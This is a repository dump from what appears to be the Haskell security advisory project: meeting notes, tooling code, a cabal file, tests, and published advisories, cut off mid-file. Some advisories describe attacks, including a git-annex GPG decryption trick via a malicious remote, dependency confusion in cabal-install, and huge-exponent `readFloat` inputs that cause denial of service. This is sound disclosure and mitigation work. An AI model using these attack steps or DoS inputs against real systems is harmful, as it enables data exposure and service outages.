do 57 | let msg = printHsecId hsid <> ": reserve id" 58 | add repoPath [filePath] >>= \case 59 | Left e -> die $ "Failed to update Git index: " <> explainGitError e 60 | Right _ -> pure () 61 | commit repoPath msg >>= \case 62 | Left e -> die $ "Failed to create Git commit: " <> explainGitError e 63 | Right _ -> pure () 64 | -------------------------------------------------------------------------------- /meeting-notes/2023-07-12.md: -------------------------------------------------------------------------------- 1 | # SRT 2023-07-12 2 | 3 | [Previous meeting](https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-06-28.md) 4 | 5 | ## Previous Items 6 | 7 | * Fraser sent the announcement/Q2 report - we are officially launched! 8 | * Tristan: will adapt responsible disclosure instructions - merged! 9 | * We do need to collect emails of packagers - Mihai will probably have them by tomorrow 10 | * We need a process update that specifies a collaboration with maintainers where they ensure patches apply cleanly and approve everything 11 | * Fraser: complete OSV data export CI action 12 | * Works on the test instance, waiting for review from OSV: https://github.com/haskell/security-advisories/tree/generated/osv-export/2023 13 | * Tristan: Will email mailing list about issue and affected packages Disclosure 14 | 15 | ## Switch TOML libraries? 16 | 17 | We were sent a patch to use a different TOML parser by its author. David will get back to the author and ask him for a PR 18 | - Advantages: It can output TOML (nice in case of schema upgrades) and it lets us delete a little code 19 | 20 | ## GHC issue 23538 21 | https://gitlab.haskell.org/ghc/ghc/-/issues/23538 22 | 23 | David will ask GHC developers about an advisory 24 | 25 | ## Example roleplay (PR #56) 26 | https://github.com/haskell/security-advisories/pull/56 27 | 28 | David submitted and got CI to pass. 29 | Process issues: 30 | * CVSS didn´t get checked, and David didn't know what to do - ask for screenshot of CVSS calculator? 31 | * Can we make a GitHub bot that creates a verbose table from a CVSS vector in a PR? 32 | * PR isn't merged 33 | * What about a bot that merges anything approved? We can just use an existing one. 34 | 35 | ## Action Items 36 | - Tristan: will create an issue about using the declaration field in the schema for tooling 37 | - David will ask GHC about a base advisory 38 | - David will ask the TOML library author for a PR 39 | - Mihai will get the rest of the package maintainer emails 40 | -------------------------------------------------------------------------------- /meeting-notes/2024-07-24.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-07-24 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-07-10.md 5 | 6 | 7 | ## GitHub dependabot integration 8 | 9 | - Gautier talked to Arnaud which made an integration attempt 10 | - Arnaud paired with someone in GH but they have not made 11 | significant work on it 12 | - We may have to start over 13 | 14 | 15 | ## Tooling 16 | 17 | - Finally merged the snapshots PR [(#179)][pr-179] (thanks Gautier) 18 | - Merged the CVSS v2.0 (+ OSV) fix [(#218)][pr-218] (thanks Tristan) 19 | - Adding the GHC ecosystem support [(#213)][pr-213] 20 | - review in progress 21 | - advisory for GHC numeric bugs [(#214)][pr-214] depends on this 22 | - CVSS 4.0 support [(#208)][pr-208] 23 | - ping andrii for status update? 24 | 25 | [pr-179]: https://github.com/haskell/security-advisories/pull/179 26 | [pr-208]: https://github.com/haskell/security-advisories/pull/208 27 | [pr-213]: https://github.com/haskell/security-advisories/pull/213 28 | [pr-214]: https://github.com/haskell/security-advisories/pull/214 29 | [pr-218]: https://github.com/haskell/security-advisories/pull/218 30 | 31 | 32 | ## Quarterly report 33 | 34 | - Was published: 35 | https://discourse.haskell.org/t/haskell-security-response-team-2024-april-june-report/9983 36 | 37 | 38 | ## Call for Volunteers 39 | 40 | - We should draft and publish one soon. 41 | - Q: call for a specific number, or wait and see? 42 | - Be general and commit later. 43 | - We can mention particular projects / initiatives and applicants 44 | can (optionally) identify the particular area(s) they'd like to 45 | tackle. 46 | - This includes development efforts, and "latent capacity" for 47 | dealing with advisory or security incidents. 48 | - José will draft an announcement, and we will review on the mailing 49 | list. 50 | 51 | 52 | ## Mailing list 53 | 54 | - FT will make sure José is on it! 55 | 56 | 57 | ## Bay Area Haskell meetup 58 | 59 | - Mihai will present about SRT at a future session 60 | -------------------------------------------------------------------------------- /meeting-notes/2025-07-10.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-07-10 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-06-25.md 5 | 6 | 7 | ## Q2 report topics 8 | 9 | - ZuriHac report (Tristan will write the section) 10 | - 1 new advisory (a couple in early April were accounted in Q1 report) 11 | - The web index not-vulnerability report :) 12 | - OCaml security team shout-out (see below) 13 | 14 | 15 | ## Security work "prospectus" 16 | 17 | Following informal conversation with Jose at ZuriHac, it is time to 18 | pull this together. Gather all the high-impact ideas (which are 19 | currently scattered across meeting notes, issues, etc) into a 20 | "prospectus" document which may help with funding decisions. 21 | 22 | 23 | ## Hackage key signing 24 | 25 | > We’re looking for more people to take part in the hackage key signing 26 | > ceremony. I figured it would be useful to have someone from the security 27 | > response team be part of that trusted group. Is this something you’d be 28 | > willing to do? It would require you to take part of the ceremony in the 29 | > next few weeks, But it can all be done online. 30 | 31 | FT will circle back with Jose and find out next steps. 32 | 33 | 34 | ## OCaml security team 35 | 36 | OCSF is starting a security team. Richard Eisenberg reached out to 37 | FT to ask for advice. FT will share some resources. 38 | 39 | 40 | ## Embaroged advisory process 41 | 42 | Tristan feels our current *ad hoc* system using the mailing list 43 | could be improved. Tristan will investigate and make 44 | recommendations on what we could implement to improve the processes. 45 | 46 | 47 | ## Purl library 48 | 49 | Consensus: merge and publish without delay. Gautier will do the 50 | Hackage publishing. 51 | 52 | 53 | ## SRT processes documentation 54 | 55 | FT realised that we need to include the hackage package 56 | maintainership in the checklists. So he will fix that :) 57 | 58 | 59 | ## Next SRT meeting 60 | 61 | It is the summer holidays (north of the Equator). Skip it 62 | for all? 63 | -------------------------------------------------------------------------------- /meeting-notes/2024-05-01.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-05-01 2 | 3 | Previous notes: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-04-17.md 5 | 6 | ## CI security advice 7 | 8 | - Mihai published the draft: 9 | https://github.com/haskell/security-advisories/blob/main/guides/github.md 10 | - A couple more comments to handle, then it will be published to Discourse 11 | 12 | ## Web area for SRT 13 | 14 | - FT will work to bootstrap this. We can publish our guides, 15 | reports, and general information there. 16 | 17 | ## Publishing our packages to Hackage 18 | 19 | - FT will begin on this in the next week. 20 | - Discussion: do we want to set up auto-publish from GitHub? 21 | - There is a GHA by Brandon Chinn to publish to Hackage. 22 | - https://github.com/fourmolu/fourmolu/blob/main/.github/workflows/release.yml 23 | - Does it work with subpackages? We would need to see. 24 | - From supply chain security POV it's better to have an action 25 | than having developers make the dist and publish themselves. 26 | - Maybe this is a good topic for our second *guide* and/or a tool 27 | to validate release tarball from the sources :) 28 | - We will look into this after the initial package release to Hackage. 29 | 30 | ## New meeting time 31 | 32 | - The when2meet tool does not seem to take timezones into account? 33 | - We might need a second round / better tool :) 34 | - FT will look for a better tool. Or else use same tool but in UTC. 35 | 36 | ## The expanding scope of SRT 37 | 38 | - With cabal-audit proposed for our repo, the scope has expanded. 39 | 40 | - Advisory workload is low, so team does have capacity to own this 41 | 42 | - FT: I see cabal-audit as a transitional effort anyway; ideally we 43 | do not have to own it forever and the capability can be absorbed 44 | into Cabal itself. 45 | 46 | - Idea: cabal-audit lives in its own repo, not security-advisories repo 47 | - Prerequisite: publish our packages 48 | - Advantage: not "owned" by SRT, others might be more eager/willing to contribute. 49 | - We will have the discussion in public, with the contributor MangoIV. 50 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0011.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0011" 4 | cwe = [200] 5 | keywords = ["exfiltration", "pgp", "historical"] 6 | aliases = ["CVE-2018-10859"] 7 | related = ["HSEC-2023-0010", "CVE-2018-10857"] 8 | 9 | [[affected]] 10 | package = "git-annex" 11 | cvss = "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" 12 | [[affected.versions]] 13 | introduced = "0.20110417" 14 | fixed = "6.20180626" 15 | 16 | [[references]] 17 | type = "ADVISORY" 18 | url = "https://git-annex.branchable.com/security/CVE-2018-10857_and_CVE-2018-10859/" 19 | ``` 20 | 21 | # *git-annex* GPG decryption attack via compromised remote 22 | 23 | A malicious server for a special remote could trick `git-annex` into 24 | decrypting a file that was encrypted to the user's GPG key. This 25 | attack could be used to expose encrypted data that was never stored 26 | in *git-annex*. Daniel Dent discovered this attack in collaboration 27 | with Joey Hess. 28 | 29 | To perform this attack the attacker needs control of a server 30 | hosting an *encrypted* special remote used by the victim's 31 | *git-annex* repository. The attacker uses `git annex addurl 32 | --relaxed` with an innocuous URL, and waits for the user's 33 | `git-annex` to download it, and upload an (encrypted) copy to the 34 | special remote they also control. At some later point, when the 35 | user downloads the content from the special remote, the attacker 36 | instead sends them the content of the GPG-encrypted file that they 37 | wish to have decrypted in its place (which may have been exfiltrated 38 | from the victim's system via the attack described in 39 | **HSEC-2023-0010** / **CVE-2018-10857**, or acquired by other 40 | means). Finally, the attacker drops their own copy of the original 41 | innocuous URL, and waits for the victim `git-annex` to send them the 42 | accidentially decrypted file. 43 | 44 | The issue was fixed by making `git-annex` refuse to download 45 | encrypted content from special remotes, unless it knows the hash of 46 | the expected content. When the attacker provides some other 47 | GPG-encrypted content, it will fail the hash check and be discarded. 48 | -------------------------------------------------------------------------------- /code/hsec-core/hsec-core.cabal: -------------------------------------------------------------------------------- 1 | cabal-version: 2.4 2 | name: hsec-core 3 | version: 0.3.0.0 4 | 5 | -- A short (one-line) description of the package. 6 | synopsis: Core package representing Haskell advisories 7 | 8 | -- A longer description of the package. 9 | description: Core package representing Haskell advisories. 10 | 11 | -- A URL where users can report bugs. 12 | -- bug-reports: 13 | 14 | -- The license under which the package is released. 15 | license: BSD-3-Clause 16 | author: Haskell Security Response Team 17 | maintainer: security-advisories@haskell.org 18 | 19 | -- A copyright notice. 20 | -- copyright: 21 | category: Data 22 | extra-doc-files: CHANGELOG.md, README.md 23 | 24 | tested-with: 25 | GHC ==8.10.7 || ==9.0.2 || ==9.2.8 || ==9.4.8 || ==9.6.6 || ==9.8.3 || ==9.10.1 || ==9.12.1 26 | 27 | library 28 | exposed-modules: 29 | Security.Advisories.Core.Advisory 30 | Security.Advisories.Core.HsecId 31 | 32 | build-depends: 33 | , base >=4.14 && <5 34 | , Cabal-syntax >=3.8.1.0 && <3.15 35 | , cvss >=0.2 && <0.3 36 | , network-uri >=2.6.3.0 && <2.8 37 | , osv >=0.1 && <0.3 38 | , pandoc-types >=1.22 && <2 39 | , safe >=0.3 && <0.4 40 | , text >=1.2 && <3 41 | , time >=1.9 && <1.15 42 | hs-source-dirs: src 43 | default-language: Haskell2010 44 | ghc-options: 45 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 46 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 47 | 48 | test-suite spec 49 | type: exitcode-stdio-1.0 50 | hs-source-dirs: test 51 | main-is: Spec.hs 52 | other-modules: 53 | Spec.QueriesSpec 54 | build-depends: 55 | , base 56 | , Cabal-syntax 57 | , cvss 58 | , hsec-core 59 | , tasty <2 60 | , tasty-hunit <0.11 61 | , text 62 | 63 | default-language: Haskell2010 64 | ghc-options: 65 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 66 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 67 | -------------------------------------------------------------------------------- /meeting-notes/2023-07-26.md: -------------------------------------------------------------------------------- 1 | # SRT 2023-07-26 2 | 3 | ## osv.dev 4 | 5 | - Hackage advisories are in production now 6 | - Version enumeration for Hackage and GHC was merged 7 | - Outstanding task: add examples to osv-schema 8 | - Mihai has PR in the works 9 | 10 | ## Update on handling embargoed stuff 11 | 12 | - Gathering contact points for downstream 13 | - Someone needs to connect the dots to send messages 14 | - Contact list needs to be committed somewhere 15 | - Private contacts not be in the repo... so where? 16 | - Stored encrypted version in the security-advisories repo? 17 | - no 18 | - Use HF bitwarden account? (access/modify via HF admin access) 19 | - agreed 20 | 21 | ## What should be part of the database format? 22 | 23 | - Repo data storage / semantics. David has some concerns: 24 | - Symlinks. Doesn't work well on Windows? 25 | - dates being stored in Git repo 26 | 27 | ## Audit GHCup download practices 28 | 29 | - https://github.com/haskell/ghcup-hs/issues/858 30 | - FT's comments: https://github.com/haskell/ghcup-hs/issues/858#issuecomment-1639300092 31 | 32 | ## Reserving HSEC IDs 33 | 34 | - It would be useful to be able to reserve an HSEC ID 35 | - FT will propose a way to do it (discuss it in a GH issue) 36 | 37 | ## Any other known historical (or current) issues? 38 | 39 | - Pandoc 40 | - https://nvd.nist.gov/vuln/detail/CVE-2023-38745 41 | - https://nvd.nist.gov/vuln/detail/CVE-2023-35936 42 | 43 | ## Action items 44 | - Mihai 45 | - Will follow up for project contacts for embargoed issues 46 | - Look into GHCup #858 47 | - Everyone 48 | - Send David the email address used by your Bitwarden account 49 | so it can be added to HF's organization. 50 | - FT 51 | - Documentation of repo structure, including symlinks 52 | - Documentation about dates - that they are retieved from Git history 53 | - full history required, not shallow clone 54 | - Create GH issue to design HSEC ID reservation feature 55 | - re Base readFloat, update bgamari that advisory exists 56 | - ping pandoc folks, ask them to submit advisories 57 | - someone 58 | - Requirements/guidelines for dependency analysis tooling 59 | - Start writing them down, commit to our repo 60 | -------------------------------------------------------------------------------- /meeting-notes/2023-06-28.md: -------------------------------------------------------------------------------- 1 | # SRT 2023-06-28 2 | 3 | ## Previous Action Items 4 | 5 | - Fraser did not yet draft the SRT announcement 6 | - We still have several known issues yet to have the advisories submitted 7 | 8 | ## Library advisory role-play 9 | 10 | - For multiple affected packages, where root cause is in a 11 | lower-level dependency: we MUST mention the "root" package, and 12 | SHOULD mention dependent packages that specifically mitigate the 13 | issue. So that tooling (e.g. cabal audit) can deduce that the 14 | issue is not occurring. 15 | 16 | - Upcoming "vex" standard: 17 | - https://blog.adolus.com/what-is-vex-and-what-does-it-have-to-do-with-sboms 18 | - https://cyclonedx.org/capabilities/vex/ 19 | 20 | 21 | ## OSV export 22 | 23 | - demo 24 | - branch name 25 | - **decision: `generated/osv-export`** 26 | - git "user id" (name and email address) 27 | - Haskell Security Response Team 28 | - commit message 29 | - currently just the timestamp 30 | - could include a reference to commit ID and/or commit message from the `main` branch 31 | - **Decision**: include source commit ID in OSV branch commit message 32 | - Casey: what about signing the commits? 33 | - FT: then the private key needs to live in GitHub secrets. Not thrilled about it. 34 | - sigstore? What sort of GitHub actions integration do they have? 35 | - https://github.com/sigstore/gitsign 36 | - **Decision: investigate further** 37 | 38 | 39 | ## Real advisories 40 | (redacted) 41 | 42 | ## Distributor notification 43 | 44 | - We should have a directory of important distributors so that they can 45 | respond to issues. 46 | - Commit the checklist / playbook to the repo. 47 | - **Owner: Tristan** 48 | - Who: 49 | - Stack, GHCup, haskell-ci? 50 | - Linux distros 51 | 52 | ## Advisory "official launch" 53 | 54 | - still needs to draft announcement (David will draft and send to mailing list) 55 | - Also need to do quarterly report, so can roll them into one announcement :) 56 | 57 | ## Action items 58 | - Tristan: will adapt responsible disclosure instructions 59 | - Fraser: complete OSV data export CI action 60 | - David: will draft announcement/report for group 61 | - Tristan: Will email mailing list about **** issue and affected packages 62 | -------------------------------------------------------------------------------- /code/hsec-tools/test/Spec.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE OverloadedStrings #-} 2 | 3 | module Main where 4 | 5 | import Data.Aeson.Encode.Pretty (encodePretty) 6 | import Data.List (isSuffixOf) 7 | import qualified Data.Text.IO as T 8 | import qualified Data.Text.Lazy as LText 9 | import qualified Data.Text.Lazy.Encoding as LText 10 | import Data.Time (UTCTime(UTCTime)) 11 | import Data.Time.Calendar.OrdinalDate (fromOrdinalDate) 12 | import Paths_hsec_tools (getDataFileName) 13 | import qualified Security.Advisories.Convert.OSV as OSV 14 | import Security.Advisories.Parse 15 | import qualified Spec.FormatSpec as FormatSpec 16 | import System.Directory (listDirectory) 17 | import Test.Tasty (defaultMain, testGroup, TestTree) 18 | import Test.Tasty.Golden (goldenVsString) 19 | import Text.Pretty.Simple (pShowNoColor) 20 | 21 | main :: IO () 22 | main = do 23 | goldenFiles <- listGoldenFiles 24 | defaultMain $ 25 | testGroup 26 | "Tests" 27 | [ goldenTestsSpec goldenFiles 28 | , FormatSpec.spec 29 | ] 30 | 31 | listGoldenFiles :: IO [FilePath] 32 | listGoldenFiles = map (mappend dpath) . filter (not . isSuffixOf ".golden") <$> (getDataFileName dpath >>= listDirectory) 33 | where 34 | dpath = "test/golden/" 35 | 36 | goldenTestsSpec :: [FilePath] -> TestTree 37 | goldenTestsSpec goldenFiles = testGroup "Golden test" $ map doGoldenTest goldenFiles 38 | 39 | doGoldenTest :: FilePath -> TestTree 40 | doGoldenTest fp = goldenVsString fp (fp <> ".golden") (LText.encodeUtf8 <$> doCheck) 41 | where 42 | doCheck :: IO LText.Text 43 | doCheck = do 44 | input <- getDataFileName fp >>= T.readFile 45 | let fakeDate = UTCTime (fromOrdinalDate 1970 0) 0 46 | attr = OutOfBandAttributes 47 | { oobPublished = fakeDate 48 | , oobModified = fakeDate 49 | } 50 | res = parseAdvisory NoOverrides (Right attr) input 51 | osvExport = case res of 52 | Right adv -> 53 | let osv = OSV.convert adv 54 | in LText.unlines 55 | [ pShowNoColor osv 56 | , LText.decodeUtf8 (encodePretty osv) 57 | ] 58 | Left _ -> "" 59 | pure (LText.unlines [pShowNoColor res, osvExport]) 60 | -------------------------------------------------------------------------------- /meeting-notes/2023-05-31.md: -------------------------------------------------------------------------------- 1 | # SRT 2023-05-31 2 | 3 | ## Review open tickets 4 | 5 | - **ensure OSV schema compatibility (#3)** 6 | - register HSEC database and hackage ecosystem with OSV (#4) 7 | - update hackage with "report security issue" feature (#7) 8 | - Tristan's update: there is a template, where we can add it. 9 | - add reporting how-to to haskell.org (#8) 10 | - example advisory (#14) 11 | 12 | ## Future tasks (no issue yet) 13 | 14 | - **Announcements of security-advisories readiness to receive contributions** 15 | - OSV export 16 | - improving the tooling to "check all" / "render all" 17 | - static site generation / CI/CD for publishing it 18 | 19 | ## Directory structure 20 | 21 | - rustsec uses directories for `crates/packagename` and `rust/(rustdoc|std|...)`. We can do similar. 22 | - the CI already supports nested directory 23 | - the only file extension examined is: `*.md` 24 | 25 | 26 | ## Ask about cabal.project.freeze 27 | 28 | - it gets in the way of development (for me) as I have different GHC version. 29 | - do we need to keep it? If so, can we mitigate the impact on developers somehow? 30 | - Gautier: it's a way to be in sync with nix, but if the CI does not use it, I guess we can drop it 31 | - Remove it and see if nix build breaks? 32 | 33 | ## Tooling to import older CVEs 34 | 35 | - FT: AFAIK it's mostly in blog posts, a few CVE registrations, and tribal knowledge/folklore. There doesn't seem to be much we could do automate that. 36 | 37 | 38 | ## Announcing the security-advisories is open for business 39 | 40 | - ASAP, after we are happy with the schema and CI machinery 41 | - Mailing list(s), discourse, reddit 42 | - "official" orgs - Haskell.org, HF 43 | - and their twitter/fediverse accounts, ... 44 | 45 | ## ZuriHac 46 | 47 | - Remote participation via discord server 48 | - We should have a security-advisories channel to solicit advisories, and maybe hack on tooling too. 49 | - https://s.surveylegend.com/-NWCiIfeZ0IjuNxEs7CL 50 | 51 | ## Other AIs 52 | 53 | - Follow with David about google meet access 54 | - Create issue for zurihac. If we need an impromptu meeting it's ok :) 55 | - Create issue to discuss if/how to represent packages not on hackage (e.g. on GitHub only). 56 | - For example, hackage-server lives on GitHub and makes releases from a branch. If there is an issue, how to represent introduced/fixed versions. How does OSV deal with this scenario? -------------------------------------------------------------------------------- /advisories/published/2025/HSEC-2025-0005.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2025-0005" 4 | cwe = [427] 5 | keywords = ["hackage", "supply-chain", "historical"] 6 | 7 | [[affected]] 8 | package = "cabal-install" 9 | cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N" 10 | [[affected.versions]] 11 | fixed = "3.4.0.0" 12 | introduced = "1.0.0.0" 13 | 14 | [[references]] 15 | type = "REPORT" 16 | url = "https://frasertweedale.github.io/blog-fp/posts/2021-02-12-haskell-dependency-confusion.html" 17 | ``` 18 | 19 | # `cabal-install` dependency confusion 20 | 21 | For **cabal-install < 3.4.0.0** and where multiple repositories are 22 | configured, the resolver picks the highest available version across 23 | all repositories. Where a package is only defined in a private 24 | repository, this behaviour leads to a [*dependency confusion*][blog] 25 | supply chain vulnerability. If the private package name becomes 26 | known, a malicious actor can claim the name in the public repository 27 | and publish a malicious version at a higher version number. 28 | 29 | Default `cabal-install` configurations that only use the 30 | `hackage.haskell.org` repository are not affected. Configurations 31 | that use curated private repositories **exclusively** are also not 32 | affected. 33 | 34 | [blog]: https://frasertweedale.github.io/blog-fp/posts/2021-02-12-haskell-dependency-confusion.html 35 | 36 | 37 | ## Mitigations 38 | 39 | *cabal-install* version **3.4.0.0** and higher provide an `override` 40 | option in the repository configuration. It marks the associated 41 | repository as canonical for all packages defined in that repository. 42 | No other repositories will be considered. For example: 43 | 44 | ``` 45 | -- For packages in repo.example.com, 46 | -- only versions in repo.example.com are considered 47 | active-repositories: 48 | , hackage.haskell.org 49 | , repo.example.com:override 50 | ``` 51 | 52 | Users and organisations using private repositories that contain 53 | private packages in addition to public repositories **MUST** use the 54 | `override` option to prevent dependency confusion attacks. 55 | 56 | Alternatively, projects and organisations can run a private instance 57 | of *hackage-server* and carefully curate and review its contents. 58 | Using that instance exclusively defeats supply chain attacks 59 | including *dependency confusion*. For *cabal-install < 3.4* and 60 | where using multiple repositories, this is the only effective 61 | mitigation against dependency confusion attacks. 62 | -------------------------------------------------------------------------------- /docs/call-for-volunteers-example.md: -------------------------------------------------------------------------------- 1 | **(PREAMBLE)** 2 | 3 | The Security Response Team (SRT) is formally calling for 4 | applications to join the SRT. People from the Haskell community 5 | with information security experience are encouraged to apply. This 6 | is an opportunity to have a large impact on the practice of Haskell 7 | programming going forward. If you have an interest in helping the 8 | team continue its mission, please apply! 9 | 10 | ## Security Response Team responsibilities 11 | 12 | The general responsibilities of the SRT are: 13 | 14 | - Manage the Haskell Security Advisory Database, on behalf of the 15 | Haskell community and the Haskell Foundation. 16 | - Triage and assess incoming security reports or proposed/candidate 17 | security advisories. 18 | - Assist reporters to determine CVSS scores and CWE values for 19 | confirmed security issues. 20 | - Communicate with package maintainers and the community to promote 21 | the timely resolution of reported security issues. 22 | - Ensure the security advisory data are useful for downstream 23 | security tooling. (Development of downstream tooling is not an SRT 24 | responsibility, but engaging with the developers is) 25 | - Report quarterly on the activities of the SRT and 26 | statistics/trends in new security issues. 27 | 28 | ## How can you help? 29 | 30 | - You can apply. 31 | - If you don’t want to apply but know someone who would be great, 32 | encourage them to apply. 33 | - Applicants should have experience in one or more of the following 34 | areas: 35 | - web application security 36 | - information security incident response 37 | - vulnerability research and analysis 38 | - penetration testing 39 | - cryptography 40 | - authentication and identity management 41 | - governance, risk management and compliance (GRC) 42 | - secure application development 43 | - algorithms, data structures, and their role in DoS attacks 44 | - related disciplines 45 | 46 | ## Who is involved? 47 | 48 | The current membership of the SRT is: 49 | 50 | - ***(CURRENT MEMBERS)*** 51 | 52 | The team is hoping to gain ***(FILL ME)*** new members via this call 53 | for volunteers. 54 | 55 | ## How to apply 56 | 57 | Email ***(DELEGATE )*** with subject ***Haskell SRT 58 | Application***. Include a brief overview of your background in 59 | security and the specific topics (e.g. from the list above) with 60 | which you have experience. 61 | 62 | ## Deadline 63 | 64 | Please submit your applications by end of day ***(DEADLINE)***. 65 | -------------------------------------------------------------------------------- /meeting-notes/2024-10-16.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-10-16 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-10-02.md 5 | 6 | ## Call for Volunteers 7 | 8 | - FT sent each of the 4 application to the list 9 | - Upon discussion, we will accept 2 10 | - SRT members, please review and respond on the ML (the initial thread) 11 | 12 | ## Stack traces proposal 13 | 14 | - CLC proposal: 15 | https://github.com/haskell/core-libraries-committee/issues/285#issuecomment-2414727239 16 | - Discussion: 17 | - For 2 decades people wanted stack traces, now we have them 18 | there are doubts :D 19 | - Most other languages are showing the stack trace 20 | - Sensitive information in error messages is an application 21 | developer's fault 22 | - It's not unreasonable to want a way to disable the default 23 | behaviour, or catch and suppress, if the actual program 24 | structure (e.g. function names) is sensitive for some reason. 25 | - The proposal Part 2 seems to suggest the stacktrace would be 26 | leaked with `displayException` too, which might be used for 27 | end-user facing message, perhaps it would be safer to only 28 | print them through the main exception handler. That's how 29 | python does it, printing an exception just show the error, the 30 | stacktrace is only displayed by default from uncaught 31 | exception. 32 | 33 | ## Draft quarterly report 34 | 35 | - call for volunteers update 36 | - advisory DB changes (1 new vuln, 0 historical, 2 reserved) 37 | - HSEC-2024-0003 update 38 | - haskell.org Apache httpd update 39 | - hackage-server "Reporting Vulnerabilities" link 40 | - tooling update 41 | - CVSS 4.0 work (ongoing) 42 | - GHA / Renovate progress 43 | 44 | ## GHC hash collision 45 | 46 | - Simon PJ and FT think it is not a huge deal 47 | - But we should fix it. 48 | - Changing the Hash function is simple and buys us another 10-20 49 | years (hopefully) 50 | 51 | ### Documenting known weaknesses 52 | 53 | This is a good opportunity to take a look at the ways 54 | that the compiler/toolchain can be compromised by malicious 55 | source code, and document them. Guide / blog post / GHC docs. 56 | 57 | Many of these would not warrant an HSEC-ID (especially structural 58 | issues that are impossible / very hard to fix), but we can still 59 | collect them and let the community know in a more formal way. 60 | 61 | ## GHC numeric bug 62 | 63 | - Tristan will rebase the advisory draft #214 64 | 65 | ## Updated major dependencies for hsec-tools 66 | 67 | #239 and #241 68 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0007.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0007" 4 | cwe = [1284, 789] 5 | keywords = ["toml", "parser", "dos"] 6 | 7 | [[affected]] 8 | package = "base" 9 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" 10 | [[affected.versions]] 11 | # it was introduced earlier, but this is the earliest version on Hackage 12 | introduced = "3.0.3.1" 13 | 14 | [[affected]] 15 | package = "toml-reader" 16 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" 17 | [[affected.versions]] 18 | introduced = "0.1.0.0" 19 | fixed = "0.2.0.0" 20 | 21 | [[references]] 22 | type = "REPORT" 23 | url = "https://gitlab.haskell.org/ghc/ghc/-/issues/23538" 24 | [[references]] 25 | type = "REPORT" 26 | url = "https://github.com/brandonchinn178/toml-reader/issues/8" 27 | [[references]] 28 | type = "FIX" 29 | url = "https://github.com/brandonchinn178/toml-reader/pull/9" 30 | 31 | ``` 32 | 33 | # `readFloat`: memory exhaustion with large exponent 34 | 35 | `Numeric.readFloat` takes time and memory linear in the size of the 36 | number _denoted_ by the input string. In particular, processing a 37 | number expressed in scientific notation with a very large exponent 38 | could cause a denial of service. The slowdown is observable on a 39 | modern machine running GHC 9.4.4: 40 | 41 | ``` 42 | ghci> import qualified Numeric 43 | ghci> Numeric.readFloat "1e1000000" -- near instantaneous 44 | [(Infinity,"")] 45 | ghci> Numeric.readFloat "1e10000000" -- perceptible pause 46 | [(Infinity,"")] 47 | ghci> Numeric.readFloat "1e100000000" -- ~ 3 seconds 48 | [(Infinity,"")] 49 | ghci> Numeric.readFloat "1e1000000000" -- ~ 35 seconds 50 | [(Infinity,"")] 51 | ``` 52 | 53 | ## In *base* 54 | 55 | `Numeric.readFloat` is defined for all `RealFrac a => a`: 56 | 57 | ```haskell 58 | readFloat :: RealFrac a => ReadS a 59 | ``` 60 | 61 | The `RealFrac` type class does not express any bounds on the size of 62 | values representable in the types for which instances exist, so 63 | bounds checking is not possible (in this *generic* function). 64 | `readFloat` uses to `Text.Read.Lex.numberToRational` which, among 65 | other things, calculates `10 ^ exponent`, which seems to take linear 66 | time and memory. 67 | 68 | **Mitigation:** use `read`. The `Read` instances for `Float` and 69 | `Double` perform bounds checks on the exponent, via 70 | `Text.Read.Lex.numberToRangedRational`. 71 | 72 | 73 | ## In *toml-reader* 74 | 75 | The issue was detected in *toml-reader* version 0.1.0.0, and 76 | mitigated in version 0.2.0.0 by immediately returning `Infinity` 77 | when the exponent is large enough that there's no reason to process 78 | it. 79 | -------------------------------------------------------------------------------- /advisories/published/2025/HSEC-2025-0002.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2025-0002" 4 | cwe = [] 5 | keywords = ["crypto"] 6 | related = ["GHSA-w5vr-6qhr-36cc"] 7 | 8 | [[affected]] 9 | package = "cryptonite" 10 | cvss = "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N" 11 | [[affected.versions]] 12 | introduced = "0.1" 13 | 14 | [[affected]] 15 | package = "crypton" 16 | cvss = "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N" 17 | [[affected.versions]] 18 | introduced = "0.31" 19 | fixed = "1.0.3" 20 | 21 | [[references]] 22 | type = "ARTICLE" 23 | url = "https://portswigger.net/daily-swig/dozens-of-cryptography-libraries-vulnerable-to-private-key-theft" 24 | [[references]] 25 | type = "ARTICLE" 26 | url = "https://github.com/MystenLabs/ed25519-unsafe-libs" 27 | [[references]] 28 | type = "ADVISORY" 29 | url = "https://github.com/advisories/GHSA-w5vr-6qhr-36cc" 30 | [[references]] 31 | type = "EVIDENCE" 32 | url = "https://hackage.haskell.org/package/cryptonite-0.30/docs/src/Crypto.PubKey.Ed25519.html#sign" 33 | [[references]] 34 | type = "EVIDENCE" 35 | url = 